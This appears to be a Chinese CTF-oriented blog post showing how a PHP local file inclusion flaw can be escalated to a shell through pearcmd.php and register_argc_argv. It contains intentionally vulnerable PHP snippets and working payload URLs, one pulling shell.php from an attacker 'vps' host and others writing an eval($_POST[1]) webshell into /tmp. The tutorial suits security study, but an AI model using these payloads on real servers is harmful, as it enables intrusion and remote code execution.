pearcmd.php的妙用

最新推荐文章于 2024-07-03 09:45:58 发布
原创 最新推荐文章于 2024-07-03 09:45:58 发布 · 5k 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #Web #CTF #pear

本文介绍了如何利用pearcmd.php进行远程文件拉取,并结合文件包含漏洞获取shell的方法。详细探讨了register_argc_argv配置项的作用及其与pear的关系。

pearcmd.php的妙用

文章目录

1. register_argc_argv

如果环境中含有php.ini,则默认register_argc_argv=Off;如果环境中没有php.ini,则默认register_argc_argv=On

这个register_argc_argv能干什么呢?

cli模式下

简言之,可以通过$_SERVER[‘argv’]`获得命令行参数,其中

test.php

<?php
var_dump($_SERVER['argv']);
?>

测试

image-20211220192823112

多个参数

image-20211220192856947

WEB模式中

image-20211220193208559

注意其中是用+作为分隔符的,不是&

简单的利用

修改test.php

<?php

var_dump($_SERVER['argv']);
$a = $_SERVER['argv'];
$a[0]($a[1]);
?>

image-20211220193633488

2. pearcmd.php的神奇使用

p佬的分析:Docker PHP裸文件本地包含综述 | 离别歌 (leavesongs.com)

image-20211220194003580

有一点不一样的地方,我复现的环境使用的是

ubuntu18.04
lamp
apt-get install  php-pear

我的pear存放的位置在/usr/bin/pear,pear是一个文件

image-20211220200509551

PEAR是为PHP扩展与应用库(PHP Extension and Application Repository),它是一个PHP扩展及应用的一个代码仓库
类似于composer,用于代码的下载与管理。

pearcmd.php的位置为/usr/share/php/pearcmd.php

image-20211220202211777

pear可以用来拉取远程的代码(注意:如果是php代码的话,注意不要被解析,下面举个例子)

pear install -R /tmp http://vps/shell.php

假设你的vps上在/var/www/html中,有一个shell.php

<?php
echo "aaa";
?>

如果你远程服务器中/var/www/html中php代码可以被解析,那么你使用pear拉取到的shell.php就是

aaa

如果远程服务器上的php没有被解析没有被解析,拉取到的shell.php就是

<?php
echo "aaa";
?>

具体的例子如下(因为不想被解析,所以vps上就只安装了apache2),可以看到我们的shell.php被拉取到了/tmp/tmp/pear/download中

image-20211220195829498

3. register_argc_argv和pear的关系

pear文件

#!/bin/sh

# first find which PHP binary to use
if test "x$PHP_PEAR_PHP_BIN" != "x"; then
  PHP="$PHP_PEAR_PHP_BIN"
else
  if test "/usr/bin/php" = '@'php_bin'@'; then
    PHP=php
  else
    PHP="/usr/bin/php"
  fi
fi

# then look for the right pear include dir
if test "x$PHP_PEAR_INSTALL_DIR" != "x"; then
  INCDIR=$PHP_PEAR_INSTALL_DIR
  INCARG="-d include_path=$PHP_PEAR_INSTALL_DIR"
else
  if test "/usr/share/php" = '@'php_dir'@'; then
    INCDIR=`dirname $0`
    INCARG=""
  else
    INCDIR="/usr/share/php"
    INCARG="-d include_path=/usr/share/php"
  fi
fi

exec $PHP -C -q $INCARG -d date.timezone=UTC -d output_buffering=1 -d variables_order=EGPCS -d open_basedir="" -d safe_mode=0 -d register_argc_argv="On" -d auto_prepend_file="" -d auto_append_file="" $INCDIR/pearcmd.php "$@"

需要注意的是:当执行了pear后,会将$_SERVER[‘argv’]当作参数执行!如果存在文件包含漏洞的话,就可以包含pearcmd.php,拉取远程服务器上的文件到靶机,再通过文件包含获取shell。

4. payload

靶机可出网

测试:

靶机test.php如下,需要拉取远程服务器的shell.php到靶机的/tmp目录下

<?php
include($_GET['file']);
?>

使用的payload

http://localhost/test.php?file=/usr/share/php/pearcmd.php&+install+-R+/tmp+http://vps/shell.php

image-20211220202650615

然后文件包含/tmp/tmp/pear/download/shell.php同时传参cmd即可

靶机不可出网时

image-20211220204940372

/test.php?+config-create+/&file=/usr/share/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php

根据p佬的博客中写的

image-20211220204434370

写一句话木马进hello.php

/test.php?+config-create+/&file=/usr/share/php/pearcmd.php&/<?=eval($_POST[1])?>+/tmp/hello.php

getshell

image-20211220204725797

参考链接

  1. P佬的Docker PHP裸文件本地包含综述
  2. 利用pearcmd.php从LFI到getshell
  3. 利用pearcmd.php从LFI到getshell
PHP组件pearcmd利用(本地文件包含、pearcmd&+config-create)
墨痕诉清风的博客
07-15 408
Docker默认的PHP环境恰好满足上述条件,所以我们可以直接使用下面这个数据包来在写。版本及以前,存在一处本地文件包含漏洞。当多语言特性被开启时,攻击者可以使用。首先,ThinkPHP多语言特性不是默认开启的,所以我们可以尝试包含。waf日志检查发现一处pearcmd本地文件包含探测,复现一下。如果漏洞存在,则服务器会出错,返回500页面。是一个在中国使用较多的PHP框架。虽然只能包含本地PHP文件,但在开启了。PHP环境安装了pcel/pear。参数来包含任意PHP文件。
浅谈文件包含之包含pearcmd.php漏洞
JCPS_Y的博客
10-26 4057
浅谈一下文件包含之包含pearcmd.php漏洞
LFI TO RCE之pearcmd.php妙用
Aiwin的博客
10-10 2951
LFI TO RCE之pearcmd.php妙用及NewStarCTF IncludeTwo例题
利用pearcmd.php从LFI到getshell
feng的博客
10-29 6107
前言 也是从来没有学习过这种LFI的思路。今天晚上再复现前几天的强网杯拟态的时候遇到了这个pearcms.php的文件包含,进行了一波学习。 环境 安装了pear(这样才能有pearcmd.php) 开启了register_argc_argv 存在文件包含且可以包含后缀为php的文件且没有open_basedir的限制。 先说说这个pear。我就说觉得这东西为什么很眼熟,原来昨天看php底层C的目录结构的时候刚看到过。这个东西的全称叫PHP Extension and Application Repos
ctfshow 萌新22 (类似级客巅峰web4)
Firebasky的博客
10-07 4060
在之前ctfshow平台的萌新22,大家都认为是无解的,题目也介绍了"还能搞,阿呆表示将直播倒立放水"。但是在级客巅峰结束的那天晚上,群里的师傅介绍说,如果修改了php.ini里面的配置(register_argc_argv)可以做出来。最后是真的做出来了。 使用阿呆~~~? 下面是自己的思考,感谢Guoke师傅和ha1c9on师傅的帮助 一. 源代码 <?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_mat.
CTFshow-WEB入门-PHP特性(持续更新)
feng的博客
01-20 6553
web89 利用intval的这个特性: 非空的数组会返回1,因此利用数组绕过。 web90 两种方式: ?num=4476a ?num=0x117c web91 考察了preg_match的/m模式。 默认的正则开始"^“和结束”$“只是对于正则字符串如果在修饰符中加上"m”,那么开始和结束将会指字符串的每一行:每一行的开头就是"^",结尾就是"$"。 因此?cmd=php%0a1即可 web92 <?php include("flag.php"); highlight_file(__
[HXBCTF 2021]湖湘杯easywill
weixin_45751765的博客
12-01 4009
0x00 前言 这次接触到pear有点陌生 先本地弄弄 参考师傅 https://blog.csdn.net/rfrder/article/details/121042290 啥是Pearpear (全称为PHP扩展与应用库) 1.如前所述,PEAR按照一定的分类来管理PEAR应用代码库,你的PEAR代码可以组织到其中适当的目录中,其他的人可以方便地检索并分享到你的成果。 2.PEAR不仅仅是一个代码仓库,它同时也是一个标准,使用这个标准来书写你的PHP代码,将会增强你的程序的可读性,复用性,减少
利用pearcmd.php文件包含拿shell(LFI)
m0_62422842的博客
09-08 3355
最近看博客的时候遇到有师傅总结了一个新颖的文件包含思路,通过pearcmd.php来进行本地文件包含来拿shell,我感觉还挺有意思的,就花时间来学习了一下。
Pearcmd.php
The_Epiphany的博客
03-25 547
pecl是PHP中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库。2.我们要知道pearcmd.php的路径,因为实质上我们是想要先去包含pearcmd.php文件,进而实现pear命令调用,然后写入恶意文件。最终我们将恶意代码插入到了/tmp/shell.php中,最后包含/tmp/shell.php文件即可。`==这段代码,其会将query-string中的值赋给argv,实际上是将?*(一个开源的应用容器引擎)任意版本镜像中,pcel/pear都会被默认安装,默认路径==`
[HXBCTF 2021]easywill writeup(WillPHP源码审计+利用pearcmd.php文件包含getshell)
ShenZ的博客
04-18 957
[HXBCTF 2021]easywill [HXBCTF 2021]easywill 1.WillPHP源码审计 2.利用pearcmd.php文件包含getshell assign函数 看willphp\wiphp\View.php 最终到renderTo方法时$_vars数组的值是我们index.php中传入的$_vars[name]=value 我们只需要让name为cfile,extact变量覆盖掉下面include的$cfile,即可进行任意文件包含
php 利用pearcmd实现裸文件包含
Biodog的博客
12-03 2464
主要内容参考P神博客https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html 0x00phpinfo与条件竞争 之前做题好像遇到过,再复习一下 我们对任意一个PHP文件发送一个上传的数据包时,不管这个PHP服务后端是否有处理$_FILES的逻辑,PHP都会将用户上传的数据先保存到一个临时文件中,这个文件一般位于系统临时目录,文件名是php开头,后面跟6个随机字符;在整个PHP文件执行完毕后,这些上传的临时文件就会被清理掉
精选资源
pear_2.1.6(2).apk
10-25
pear_2.1.6(2).apk
ctfshow MengXIn 下(pearcmd.php妙用&条件竞争&简单密码&简单misc)
weixin_63231007的博客
07-22 2510
通过可变信息通过GET方法是类似于参数传递给可执行文件。许多语言处理等方面argcargv参数。argc是参数计数,并,argv是索引数组,包含的参数。如果您想声明变量$argc和$argv和模仿这种功能,使register_argc_argv...
利用pearcmd.php本地文件包含(LFI)
Mrs_H的博客
01-08 7464
利用pearcmd.php本地文件包含(LFI) 一.前言 pearcmd这个东西很久以前就已经复现过了,但是当时没有记录下来。这些天在整理之前比赛的wp的时候突然看见了pear的LFI到getshell,就突然想起来自己应该是利用过了的。但是怎么找也找不到之前的笔记,于是就有了再复现一遍的想法。 二.正文 1.环境的准备 这里的话我使用的是docker来搭建的一个lamp,然后在这个lamp上面进行后续的漏洞复现。至于为什么这么做呢?照P神的话来说就是因为在Docker任意版本的镜像中pear都会被默认安
phppear是,如何在PHP中利用Pear实现一个邮件发送功能
weixin_34838910的博客
03-09 428
如何在PHP中利用Pear实现一个邮件发送功能发布时间:2020-12-18 16:14:23来源:亿速云阅读:97作者:Leah这篇文章给大家介绍如何在PHP中利用Pear实现一个邮件发送功能,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。一、PEAR安装1、PEAR简介PEARPHP扩展与应用库(the PHP Extension and Application Repo...
pearcmd.php文件包含妙用
leekos的博客,分享web安全相关知识~
07-24 2320
PHP中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库。在7.4及以后,需要我们在编译PHP的时候指定。这样我们就可以从远程服务器上下载shell到靶机上了,使用文件包含注意将路径url编码。不过,在Docker任意版本镜像中,pcel/pear都会被默认安装,安装的路径在。必须传入两个参数,第一个参数传入绝对路径,第二个参数传入想要保存的文件名。运行,如果存在文件包含漏洞,就可以运行这个命令行工具。此处我们传入的第一个参数不是一个绝对路径,所以不行。这样,在文件包含下,我们就可以运行。
利用 pearcmd.php 实现 Getshell
1tachi的博客
01-12 735
文章目录源码分析利用Pearcmd.php 学习连接:西湖论剑的一道Web 源码 <?php highlight_file(__FILE__); if(isset($_GET['check'])){ if(file_get_contents($_GET['check']) === "LFI"){ @include($_GET['a']); }else{ die("no!"); } } 分析 信息搜集了一圈,啥也没有,也就是说不知
初始认识pearcmd.php
m0_62706061的博客
11-17 715
初始pearcmd.php
pearcmd】通过pearcmd.php 进行GetShell
SwBack的博客
07-03 602
通过pearcmd.php进行文件包含.从而getshell
pearcmd文件包含
最新发布
03-09
### 关于 `pearcmd` 文件包含的详细说明 #### PEARCMD 的默认路径与自定义安装路径 在 Docker 环境下,`pearcmd` 默认被安装在 `/usr/local/lib/php/pearcmd.php`。然而,在某些实验环境中,如果自行安装了 `pearcmd`,其路径可能会有所不同,例如位于 `/usr/share/php/pearcmd.php`[^1]。 #### ThinkPHP 中基于 `pearcmd` 的文件包含漏洞风险 当 ThinkPHP 开启多语言支持时,可能存在一种文件包含漏洞。这种情况下,攻击者能够通过 GET 请求、HTTP 头部或者 Cookie 参数传递特殊构造的数据来触发目录遍历并最终达到远程代码执行 (RCE) 的目的。具体而言,利用 `pearcmd.php` 可能成为实施此类攻击的一个途径之一[^2]。 #### PHP 文件包含机制概述 PHP 提供了几种用于动态加载其他脚本的方法,其中就包括 `include()` 和 `include_once()` 函数。这些函数允许开发者在一个脚本运行期间引入另一个文件的内容;值得注意的是,即使发生错误(比如找不到指定文件),程序仍将继续执行而不会终止整个流程[^3]。 #### 利用 URL 编码绕过安全限制的例子 对于一些 Web 应用程序中的认证保护措施,可以尝试使用特定模式的 URL 编码字符串来进行绕过操作。例如,针对某个已知的安全缺陷 CVE-2020-14882,可以通过精心设计的 URL 地址访问受控资源而不需提供有效的凭证信息。这表明即使是看似简单的输入验证也可能存在潜在的风险点[^4]。 #### 数据处理方式及其安全性影响 发送 HTTP 请求时所携带的数据将以最原始的形式展示给服务器端解析器。这意味着如果不加任何过滤直接输出含有 PHP 语法结构的信息,则会被当作可执行指令对待而非纯文本显示出来。因此,理解如何正确运用像 `php://filter` 协议这样的特性至关重要,因为它可以直接关系到应用程序的整体安全性[^5]。 ```bash # 示例:检查当前系统上是否存在 pearcmd 并查看其位置 which pearcmd || echo "PearCmd not found" find / -name 'pearcmd*' 2>/dev/null | grep '.php$' ```
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值